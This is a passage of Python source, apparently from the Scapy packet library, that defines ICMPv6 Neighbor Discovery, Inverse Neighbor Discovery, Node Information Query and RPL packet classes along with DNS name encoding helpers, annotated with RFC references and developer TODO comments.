1920 XShortField("res", 0),
1921 IntField("mtu", 1280)]
1923 def mysummary(self):
1924 return self.sprintf("%name% %mtu%")
1927class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
1928 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
1929 fields_desc = [ByteField("type", 6),
1930 ByteField("len", 1),
1931 ByteField("shortcutlim", 40), # XXX
1932 ByteField("res1", 0),
1933 IntField("res2", 0)]
1936class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
1937 name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
1938 fields_desc = [ByteField("type", 7),
1939 ByteField("len", 1),
1940 ShortField("res", 0),
1941 IntField("advint", 0)]
1943 def mysummary(self):
1944 return self.sprintf("%name% %advint% milliseconds")
1947class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
1948 name = "ICMPv6 Neighbor Discovery - Home Agent Information"
1949 fields_desc = [ByteField("type", 8),
1950 ByteField("len", 1),
1951 ShortField("res", 0),
1952 ShortField("pref", 0),
1953 ShortField("lifetime", 1)]
1955 def mysummary(self):
1956 return self.sprintf("%name% %pref% %lifetime% seconds")
1958# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1960# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1963class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1964 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
1965 fields_desc = [ByteField("type", 17),
1966 ByteField("len", 3),
1967 ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
1968 2: "New Care-Of Address",
1969 3: "NAR's IP address"}),
1970 ByteField("plen", 64),
1971 IntField("res", 0),
1972 IP6Field("addr", "::")]
1975class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1976 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501
1977 fields_desc = [ByteField("type", 18),
1978 ByteField("len", 3),
1979 ByteField("optcode", 0),
1980 ByteField("plen", 64),
1981 IntField("res", 0),
1982 IP6Field("prefix", "::")]
1985_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1986 1: "LLA for the new AP",
1987 2: "LLA of the MN",
1988 3: "LLA of the NAR",
1989 4: "LLA of the src of TrSolPr or PrRtAdv msg",
1990 5: "AP identified by LLA belongs to current iface of router", # noqa: E501
1991 6: "No preifx info available for AP identified by the LLA", # noqa: E501
1992 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501
1995class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1996 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501
1997 fields_desc = [ByteField("type", 19),
1998 ByteField("len", 1),
1999 ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
2000 MACField("lla", ETHER_ANY)] # We only support ethernet
2003class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
2004 name = "ICMPv6 Neighbor Discovery - MAP Option"
2005 fields_desc = [ByteField("type", 23),
2006 ByteField("len", 3),
2007 BitField("dist", 1, 4),
2008 BitField("pref", 15, 4), # highest availability
2009 BitField("R", 1, 1),
2010 BitField("res", 0, 7),
2011 IntField("validlifetime", 0xffffffff),
2012 IP6Field("addr", "::")]
2015class _IP6PrefixField(IP6Field):
2016 __slots__ = ["length_from"]
2018 def __init__(self, name, default):
2019 IP6Field.__init__(self, name, default)
2020 self.length_from = lambda pkt: 8 * (pkt.len - 1)
2022 def addfield(self, pkt, s, val):
2023 return s + self.i2m(pkt, val)
2025 def getfield(self, pkt, s):
2026 tmp_len = self.length_from(pkt)
2027 p = s[:tmp_len]
2028 if tmp_len < 16:
2029 p += b'\x00' * (16 - tmp_len)
2030 return s[tmp_len:], self.m2i(pkt, p)
2032 def i2len(self, pkt, x):
2033 return len(self.i2m(pkt, x))
2035 def i2m(self, pkt, x):
2036 tmp_len = pkt.len
2038 if x is None:
2039 x = "::"
2040 if tmp_len is None:
2041 tmp_len = 1
2042 x = inet_pton(socket.AF_INET6, x)
2044 if tmp_len is None:
2045 return x
2046 if tmp_len in [0, 1]:
2047 return b""
2048 if tmp_len in [2, 3]:
2049 return x[:8 * (tmp_len - 1)]
2051 return x + b'\x00' * 8 * (tmp_len - 3)
2054class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
2055 name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
2056 fields_desc = [ByteField("type", 24),
2057 FieldLenField("len", None, length_of="prefix", fmt="B",
2058 adjust=lambda pkt, x: x // 8 + 1),
2059 ByteField("plen", None),
2060 BitField("res1", 0, 3),
2061 BitEnumField("prf", 0, 2, icmp6ndraprefs),
2062 BitField("res2", 0, 3),
2063 IntField("rtlifetime", 0xffffffff),
2064 _IP6PrefixField("prefix", None)]
2066 def mysummary(self):
2067 return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2070class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
2071 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
2072 fields_desc = [ByteField("type", 25),
2073 FieldLenField("len", None, count_of="dns", fmt="B",
2074 adjust=lambda pkt, x: 2 * x + 1),
2075 ShortField("res", None),
2076 IntField("lifetime", 0xffffffff),
2077 IP6ListField("dns", [],
2078 length_from=lambda pkt: 8 * (pkt.len - 1))]
2080 def mysummary(self):
2081 return self.sprintf("%name% ") + ", ".join(self.dns)
2084class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
2085 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
2086 fields_desc = [ByteField("type", 26),
2087 ByteField("len", 1),
2088 BitField("res", 0, 48)]
2090# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2091# described in section 3.1 of RFC 1035
2092# XXX Label should be at most 63 octets in length : we do not enforce it
2093# Total length of domain should be 255 : we do not enforce it either
2096class DomainNameListField(StrLenField):
2097 __slots__ = ["padded"]
2098 islist = 1
2099 padded_unit = 8
2101 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501
2102 self.padded = padded
2103 StrLenField.__init__(self, name, default, length_from=length_from)
2105 def i2len(self, pkt, x):
2106 return len(self.i2m(pkt, x))
2108 def i2h(self, pkt, x):
2109 if not x:
2110 return []
2111 return x
2113 def m2i(self, pkt, x):
2114 x = plain_str(x) # Decode bytes to string
2115 res = []
2116 while x:
2117 # Get a name until \x00 is reached
2118 cur = []
2119 while x and ord(x[0]) != 0:
2120 tmp_len = ord(x[0])
2121 cur.append(x[1:tmp_len + 1])
2122 x = x[tmp_len + 1:]
2123 if self.padded:
2124 # Discard following \x00 in padded mode
2125 if len(cur):
2126 res.append(".".join(cur) + ".")
2127 else:
2128 # Store the current name
2129 res.append(".".join(cur) + ".")
2130 if x and ord(x[0]) == 0:
2131 x = x[1:]
2132 return res
2134 def i2m(self, pkt, x):
2135 def conditionalTrailingDot(z):
2136 if z and orb(z[-1]) == 0:
2137 return z
2138 return z + b'\x00'
2139 # Build the encode names
2140 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501
2141 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
2143 # In padded mode, add some \x00 bytes
2144 if self.padded and not len(ret_string) % self.padded_unit == 0:
2145 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501
2147 return ret_string
2150class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
2151 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
2152 fields_desc = [ByteField("type", 31),
2153 FieldLenField("len", None, length_of="searchlist", fmt="B",
2154 adjust=lambda pkt, x: 1 + x // 8),
2155 ShortField("res", None),
2156 IntField("lifetime", 0xffffffff),
2157 DomainNameListField("searchlist", [],
2158 length_from=lambda pkt: 8 * pkt.len - 8,
2159 padded=True)
2160 ]
2162 def mysummary(self):
2163 return self.sprintf("%name% ") + ", ".join(self.searchlist)
2166class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910
2167 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
2168 fields_desc = [ByteField("type", 37),
2169 FieldLenField("len", None, length_of="URI", fmt="B",
2170 adjust=lambda pkt, x: (2 + x) // 8),
2171 ICMPv6NDOptDataField("URI", "", strip_zeros=True,
2172 length_from=lambda pkt:
2173 8 * max(pkt.len, 1) - 2)]
2175 def mysummary(self):
2176 return self.sprintf("%name% %URI%")
2179class _PREF64(IP6Field):
2180 def addfield(self, pkt, s, val):
2181 return s + self.i2m(pkt, val)[:12]
2183 def getfield(self, pkt, s):
2184 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4)
2187class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781
2188 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
2189 fields_desc = [ByteField("type", 38),
2190 ByteField("len", 2),
2191 BitField("scaledlifetime", 0, 13),
2192 BitEnumField("plc", 0, 3,
2193 ["/96", "/64", "/56", "/48", "/40", "/32"]),
2194 _PREF64("prefix", "::")]
2196 def mysummary(self):
2197 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
2198 return self.sprintf("%name% %prefix%") + plc
2200# End of ICMPv6 Neighbor Discovery Options.
2203class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
2204 name = "ICMPv6 Neighbor Discovery - Router Solicitation"
2205 fields_desc = [ByteEnumField("type", 133, icmp6types),
2206 ByteField("code", 0),
2207 XShortField("cksum", None),
2208 IntField("res", 0)]
2209 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2212class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
2213 name = "ICMPv6 Neighbor Discovery - Router Advertisement"
2214 fields_desc = [ByteEnumField("type", 134, icmp6types),
2215 ByteField("code", 0),
2216 XShortField("cksum", None),
2217 ByteField("chlim", 0),
2218 BitField("M", 0, 1),
2219 BitField("O", 0, 1),
2220 BitField("H", 0, 1),
2221 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191
2222 BitField("P", 0, 1),
2223 BitField("res", 0, 2),
2224 ShortField("routerlifetime", 1800),
2225 IntField("reachabletime", 0),
2226 IntField("retranstimer", 0)]
2227 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2229 def answers(self, other):
2230 return isinstance(other, ICMPv6ND_RS)
2232 def mysummary(self):
2233 return self.sprintf("%name% Lifetime %routerlifetime% "
2234 "Hop Limit %chlim% Preference %prf% "
2235 "Managed %M% Other %O% Home %H%")
2238class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2239 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
2240 fields_desc = [ByteEnumField("type", 135, icmp6types),
2241 ByteField("code", 0),
2242 XShortField("cksum", None),
2243 IntField("res", 0),
2244 IP6Field("tgt", "::")]
2245 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2247 def mysummary(self):
2248 return self.sprintf("%name% (tgt: %tgt%)")
2250 def hashret(self):
2251 return bytes_encode(self.tgt) + self.payload.hashret()
2254class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2255 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
2256 fields_desc = [ByteEnumField("type", 136, icmp6types),
2257 ByteField("code", 0),
2258 XShortField("cksum", None),
2259 BitField("R", 1, 1),
2260 BitField("S", 0, 1),
2261 BitField("O", 1, 1),
2262 XBitField("res", 0, 29),
2263 IP6Field("tgt", "::")]
2264 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2266 def mysummary(self):
2267 return self.sprintf("%name% (tgt: %tgt%)")
2269 def hashret(self):
2270 return bytes_encode(self.tgt) + self.payload.hashret()
2272 def answers(self, other):
2273 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2275# associated possible options : target link-layer option, Redirected header
2278class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2279 name = "ICMPv6 Neighbor Discovery - Redirect"
2280 fields_desc = [ByteEnumField("type", 137, icmp6types),
2281 ByteField("code", 0),
2282 XShortField("cksum", None),
2283 XIntField("res", 0),
2284 IP6Field("tgt", "::"),
2285 IP6Field("dst", "::")]
2286 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2289# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2291class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
2292 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
2293 fields_desc = [ByteField("type", 9),
2294 FieldLenField("len", None, count_of="addrlist", fmt="B",
2295 adjust=lambda pkt, x: 2 * x + 1),
2296 StrFixedLenField("res", b"\x00" * 6, 6),
2297 IP6ListField("addrlist", [],
2298 length_from=lambda pkt: 8 * (pkt.len - 1))]
2301class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
2302 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2303 type = 10
2306# RFC3122
2307# Options requises : source lladdr et target lladdr
2308# Autres options valides : source address list, MTU
2309# - Comme precise dans le document, il serait bien de prendre l'adresse L2
2310# demandee dans l'option requise target lladdr et l'utiliser au niveau
2311# de l'adresse destination ethernet si aucune adresse n'est precisee
2312# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
2313# les options.
2314# Ether() must use the target lladdr as destination
2315class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
2316 name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
2317 fields_desc = [ByteEnumField("type", 141, icmp6types),
2318 ByteField("code", 0),
2319 XShortField("cksum", None),
2320 XIntField("reserved", 0)]
2321 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2323# Options requises : target lladdr, target address list
2324# Autres options valides : MTU
2327class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2328 name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
2329 fields_desc = [ByteEnumField("type", 142, icmp6types),
2330 ByteField("code", 0),
2331 XShortField("cksum", None),
2332 XIntField("reserved", 0)]
2333 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2336###############################################################################
2337# ICMPv6 Node Information Queries (RFC 4620)
2338###############################################################################
2340# [ ] Add automatic destination address computation using computeNIGroupAddr
2341# in IPv6 class (Scapy6 modification when integrated) if :
2342# - it is not provided
2343# - upper layer is ICMPv6NIQueryName() with a valid value
2344# [ ] Try to be liberal in what we accept as internal values for _explicit_
2345# DNS elements provided by users. Any string should be considered
2346# valid and kept like it has been provided. At the moment, i2repr() will
2347# crash on many inputs
2348# [ ] Do the documentation
2349# [ ] Add regression tests
2350# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2351# [ ] Check if there are differences between different stacks. Among *BSD,
2352# with others.
2353# [ ] Deal with flags in a consistent way.
2354# [ ] Implement compression in names2dnsrepr() and decompresiion in
2355# dnsrepr2names(). Should be deactivable.
2357icmp6_niqtypes = {0: "NOOP",
2358 2: "Node Name",
2359 3: "IPv6 Address",
2360 4: "IPv4 Address"}
2363class _ICMPv6NIHashret:
2364 def hashret(self):
2365 return bytes_encode(self.nonce)
2368class _ICMPv6NIAnswers:
2369 def answers(self, other):
2370 return self.nonce == other.nonce
2372# Buggy; always returns the same value during a session
2375class NonceField(StrFixedLenField):
2376 def __init__(self, name, default=None):
2377 StrFixedLenField.__init__(self, name, default, 8)
2378 if default is None:
2379 self.default = self.randval()
2382@conf.commands.register
2383def computeNIGroupAddr(name):
2384 """Compute the NI group Address. Can take a FQDN as input parameter"""
2385 name = name.lower().split(".")[0]
2386 record = chr(len(name)) + name
2387 h = md5(record.encode("utf8"))
2388 h = h.digest()
2389 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
2390 return addr
2393# Here is the deal. First, that protocol is a piece of shit. Then, we
2394# provide 4 classes for the different kinds of Requests (one for every
2395# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2396# data field class that is made to be smart by guessing the specific
2397# type of value provided :
2398#
2399# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2400# if not overridden by user
2401# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2402# if not overridden
2403# - Name in the other cases: code is set to 0, if not overridden by user
2404#
2405# Internal storage, is not only the value, but the a pair providing
2406# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
2407#
2408# Note : I merged getfield() and m2i(). m2i() should not be called
2409# directly anyway. Same remark for addfield() and i2m()
2410#
2411# -- arno
2413# "The type of information present in the Data field of a query is
2414# declared by the ICMP Code, whereas the type of information in a
2415# Reply is determined by the Qtype"
2417def names2dnsrepr(x):
2418 """
2419 Take as input a list of DNS names or a single DNS name
2420 and encode it in DNS format (with possible compression)
2421 If a string that is already a DNS name in DNS format
2422 is passed, it is returned unmodified. Result is a string.
2423 !!! At the moment, compression is not implemented !!!
2424 """
2426 if isinstance(x, bytes):
2427 if x and x[-1:] == b'\x00': # stupid heuristic
2428 return x
2429 x = [x]
2431 res = []
2432 for n in x:
2433 termin = b"\x00"
2434 if n.count(b'.') == 0: # single-component gets one more
2435 termin += b'\x00'
2436 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
2437 res.append(n)
2438 return b"".join(res)
2441def dnsrepr2names(x):
2442 """
2443 Take as input a DNS encoded string (possibly compressed)
2444 and returns a list of DNS names contained in it.
2445 If provided string is already in printable format
2446 (does not end with a null character, a one element list
2447 is returned). Result is a list.
2448 """
2449 res = []
2450 cur = b""
2451 while x:
2452 tmp_len = orb(x[0])
2453 x = x[1:]
2454 if not tmp_len:
2455 if cur and cur[-1:] == b'.':
2456 cur = cur[:-1]
2457 res.append(cur)
2458 cur = b""
2459 if x and orb(x[0]) == 0: # single component
2460 x = x[1:]
2461 continue
2462 if tmp_len & 0xc0: # XXX TODO : work on that -- arno
2463 raise Exception("DNS message can't be compressed at this point!")
2464 cur += x[:tmp_len] + b"."
2465 x = x[tmp_len:]
2466 return res
2469class NIQueryDataField(StrField):
2470 def __init__(self, name, default):
2471 StrField.__init__(self, name, default)
2473 def i2h(self, pkt, x):
2474 if x is None:
2475 return x
2476 t, val = x
2477 if t == 1:
2478 val = dnsrepr2names(val)[0]
2479 return val
2481 def h2i(self, pkt, x):
2482 if x is tuple and isinstance(x[0], int):
2483 return x
2485 # Try IPv6
2486 try:
2487 inet_pton(socket.AF_INET6, x.decode())
2488 return (0, x.decode())
2489 except Exception:
2490 pass
2491 # Try IPv4
2492 try:
2493 inet_pton(socket.AF_INET, x.decode())
2494 return (2, x.decode())
2495 except Exception:
2496 pass
2497 # Try DNS
2498 if x is None:
2499 x = b""
2500 x = names2dnsrepr(x)
2501 return (1, x)
2503 def i2repr(self, pkt, x):
2504 t, val = x
2505 if t == 1: # DNS Name
2506 # we don't use dnsrepr2names() to deal with
2507 # possible weird data extracted info
2508 res = []
2509 while val:
2510 tmp_len = orb(val[0])
2511 val = val[1:]
2512 if tmp_len == 0:
2513 break
2514 res.append(plain_str(val[:tmp_len]) + ".")
2515 val = val[tmp_len:]
2516 tmp = "".join(res)
2517 if tmp and tmp[-1] == '.':
2518 tmp = tmp[:-1]
2519 return tmp
2520 return repr(val)
2522 def getfield(self, pkt, s):
2523 qtype = getattr(pkt, "qtype")
2524 if qtype == 0: # NOOP
2525 return s, (0, b"")
2526 else:
2527 code = getattr(pkt, "code")
2528 if code == 0: # IPv6 Addr
2529 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2530 elif code == 2: # IPv4 Addr
2531 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2532 else: # Name or Unknown
2533 return b"", (1, s)
2535 def addfield(self, pkt, s, val):
2536 if ((isinstance(val, tuple) and val[1] is None) or
2537 val is None):
2538 val = (1, b"")
2539 t = val[0]
2540 if t == 1:
2541 return s + val[1]
2542 elif t == 0:
2543 return s + inet_pton(socket.AF_INET6, val[1])
2544 else:
2545 return s + inet_pton(socket.AF_INET, val[1])
2548class NIQueryCodeField(ByteEnumField):
2549 def i2m(self, pkt, x):
2550 if x is None:
2551 d = pkt.getfieldval("data")
2552 if d is None:
2553 return 1
2554 elif d[0] == 0: # IPv6 address
2555 return 0
2556 elif d[0] == 1: # Name
2557 return 1
2558 elif d[0] == 2: # IPv4 address
2559 return 2
2560 else:
2561 return 1
2562 return x
2565_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2567# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2568# 8: "Link-local addresses", 16: "Site-local addresses",
2569# 32: "Global addresses" }
2571# "This NI type has no defined flags and never has a Data Field". Used
2572# to know if the destination is up and implements NI protocol.
2575class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
2576 name = "ICMPv6 Node Information Query - NOOP Query"
2577 fields_desc = [ByteEnumField("type", 139, icmp6types),
2578 NIQueryCodeField("code", None, _niquery_code),
2579 XShortField("cksum", None),
2580 ShortEnumField("qtype", 0, icmp6_niqtypes),
2581 BitField("unused", 0, 10),
2582 FlagsField("flags", 0, 6, "TACLSG"),
2583 NonceField("nonce", None),
2584 NIQueryDataField("data", None)]
2587class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
2588 name = "ICMPv6 Node Information Query - IPv6 Name Query"
2589 qtype = 2
2591# We ask for the IPv6 address of the peer
2594class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
2595 name = "ICMPv6 Node Information Query - IPv6 Address Query"
2596 qtype = 3
2597 flags = 0x3E
2600class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
2601 name = "ICMPv6 Node Information Query - IPv4 Address Query"
2602 qtype = 4
2605_nireply_code = {0: "Successful Reply",
2606 1: "Response Refusal",
2607 3: "Unknown query type"}
2609_nireply_flags = {1: "Reply set incomplete",
2610 2: "All unicast addresses",
2611 4: "IPv4 addresses",
2612 8: "Link-local addresses",
2613 16: "Site-local addresses",
2614 32: "Global addresses"}
2616# Internal repr is one of those :
2617# (0, "some string") : unknown qtype value are mapped to that one
2618# (3, [ (ttl, ip6), ... ])
2619# (4, [ (ttl, ip4), ... ])
2620# (2, [ttl, dns_names]) : dns_names is one string that contains
2621# all the DNS names. Internally it is kept ready to be sent
2622# (undissected). i2repr() decode it for user. This is to
2623# make build after dissection bijective.
2624#
2625# I also merged getfield() and m2i(), and addfield() and i2m().
2628class NIReplyDataField(StrField):
2630 def i2h(self, pkt, x):
2631 if x is None:
2632 return x
2633 t, val = x
2634 if t == 2:
2635 ttl, dnsnames = val
2636 val = [ttl] + dnsrepr2names(dnsnames)
2637 return val
2639 def h2i(self, pkt, x):
2640 qtype = 0 # We will decode it as string if not
2641 # overridden through 'qtype' in pkt
2643 # No user hint, let's use 'qtype' value for that purpose
2644 if not isinstance(x, tuple):
2645 if pkt is not None:
2646 qtype = pkt.qtype
2647 else:
2648 qtype = x[0]
2649 x = x[1]
2651 # From that point on, x is the value (second element of the tuple)
2653 if qtype == 2: # DNS name
2654 if isinstance(x, (str, bytes)): # listify the string
2655 x = [x]
2656 if isinstance(x, list):
2657 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501
2658 if x and isinstance(x[0], int):
2659 ttl = x[0]
2660 names = x[1:]
2661 else:
2662 ttl = 0
2663 names = x
2664 return (2, [ttl, names2dnsrepr(names)])
2666 elif qtype in [3, 4]: # IPv4 or IPv6 addr
2667 if not isinstance(x, list):
2668 x = [x] # User directly provided an IP, instead of list
2670 def fixvalue(x):
2671 # List elements are not tuples, user probably
2672 # omitted ttl value : we will use 0 instead
2673 if not isinstance(x, tuple):
2674 x = (0, x)
2675 # Decode bytes
2676 if isinstance(x[1], bytes):
2677 x = (x[0], x[1].decode())
2678 return x
2680 return (qtype, [fixvalue(d) for d in x])
2682 return (qtype, x)
2684 def addfield(self, pkt, s, val):
2685 t, tmp = val
2686 if tmp is None:
2687 tmp = b""
2688 if t == 2:
2689 ttl, dnsstr = tmp
2690 return s + struct.pack("!I", ttl) + dnsstr
2691 elif t == 3:
2692 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501
2693 elif t == 4:
2694 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501
2695 else:
2696 return s + tmp
2698 def getfield(self, pkt, s):
2699 code = getattr(pkt, "code")
2700 if code != 0:
2701 return s, (0, b"")
2703 qtype = getattr(pkt, "qtype")
2704 if qtype == 0: # NOOP
2705 return s, (0, b"")
2707 elif qtype == 2:
2708 if len(s) < 4:
2709 return s, (0, b"")
2710 ttl = struct.unpack("!I", s[:4])[0]
2711 return b"", (2, [ttl, s[4:]])
2713 elif qtype == 3: # IPv6 addresses with TTLs
2714 # XXX TODO : get the real length
2715 res = []
2716 while len(s) >= 20: # 4 + 16
2717 ttl = struct.unpack("!I", s[:4])[0]
2718 ip = inet_ntop(socket.AF_INET6, s[4:20])
2719 res.append((ttl, ip))
2720 s = s[20:]
2721 return s, (3, res)
2723 elif qtype == 4: # IPv4 addresses with TTLs
2724 # XXX TODO : get the real length
2725 res = []
2726 while len(s) >= 8: # 4 + 4
2727 ttl = struct.unpack("!I", s[:4])[0]
2728 ip = inet_ntop(socket.AF_INET, s[4:8])
2729 res.append((ttl, ip))
2730 s = s[8:]
2731 return s, (4, res)
2732 else:
2733 # XXX TODO : implement me and deal with real length
2734 return b"", (0, s)
2736 def i2repr(self, pkt, x):
2737 if x is None:
2738 return "[]"
2740 if isinstance(x, tuple) and len(x) == 2:
2741 t, val = x
2742 if t == 2: # DNS names
2743 ttl, tmp_len = val
2744 tmp_len = dnsrepr2names(tmp_len)
2745 names_list = (plain_str(name) for name in tmp_len)
2746 return "ttl:%d %s" % (ttl, ",".join(names_list))
2747 elif t == 3 or t == 4:
2748 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501
2749 return repr(val)
2750 return repr(x) # XXX should not happen
2752# By default, sent responses have code set to 0 (successful)
2755class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
2756 name = "ICMPv6 Node Information Reply - NOOP Reply"
2757 fields_desc = [ByteEnumField("type", 140, icmp6types),
2758 ByteEnumField("code", 0, _nireply_code),
2759 XShortField("cksum", None),
2760 ShortEnumField("qtype", 0, icmp6_niqtypes),
2761 BitField("unused", 0, 10),
2762 FlagsField("flags", 0, 6, "TACLSG"),
2763 NonceField("nonce", None),
2764 NIReplyDataField("data", None)]
2767class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
2768 name = "ICMPv6 Node Information Reply - Node Names"
2769 qtype = 2
2772class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
2773 name = "ICMPv6 Node Information Reply - IPv6 addresses"
2774 qtype = 3
2777class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
2778 name = "ICMPv6 Node Information Reply - IPv4 addresses"
2779 qtype = 4
2782class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
2783 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
2784 code = 1
2787class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
2788 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
2789 code = 2
2792def _niquery_guesser(p):
2793 cls = conf.raw_layer
2794 type = orb(p[0])
2795 if type == 139: # Node Info Query specific stuff
2796 if len(p) > 6:
2797 qtype, = struct.unpack("!H", p[4:6])
2798 cls = {0: ICMPv6NIQueryNOOP,
2799 2: ICMPv6NIQueryName,
2800 3: ICMPv6NIQueryIPv6,
2801 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
2802 elif type == 140: # Node Info Reply specific stuff
2803 code = orb(p[1])
2804 if code == 0:
2805 if len(p) > 6:
2806 qtype, = struct.unpack("!H", p[4:6])
2807 cls = {2: ICMPv6NIReplyName,
2808 3: ICMPv6NIReplyIPv6,
2809 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
2810 elif code == 1:
2811 cls = ICMPv6NIReplyRefuse
2812 elif code == 2:
2813 cls = ICMPv6NIReplyUnknown
2814 return cls
2817#############################################################################
2818#############################################################################
2819# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2820#############################################################################
2821#############################################################################
2823# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
2824rplcodes = {0: "DIS",
2825 1: "DIO",
2826 2: "DAO",
2827 3: "DAO-ACK",
2828 # 4: "P2P-DRO",
2829 # 5: "P2P-DRO-ACK",
2830 # 6: "Measurement",
2831 7: "DCO",
2832 8: "DCO-ACK"}
2835class ICMPv6RPL(_ICMPv6): # RFC 6550
2836 name = 'RPL'
2837 fields_desc = [ByteEnumField("type", 155, icmp6types),
2838 ByteEnumField("code", 0, rplcodes),
2839 XShortField("cksum", None)]
2840 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
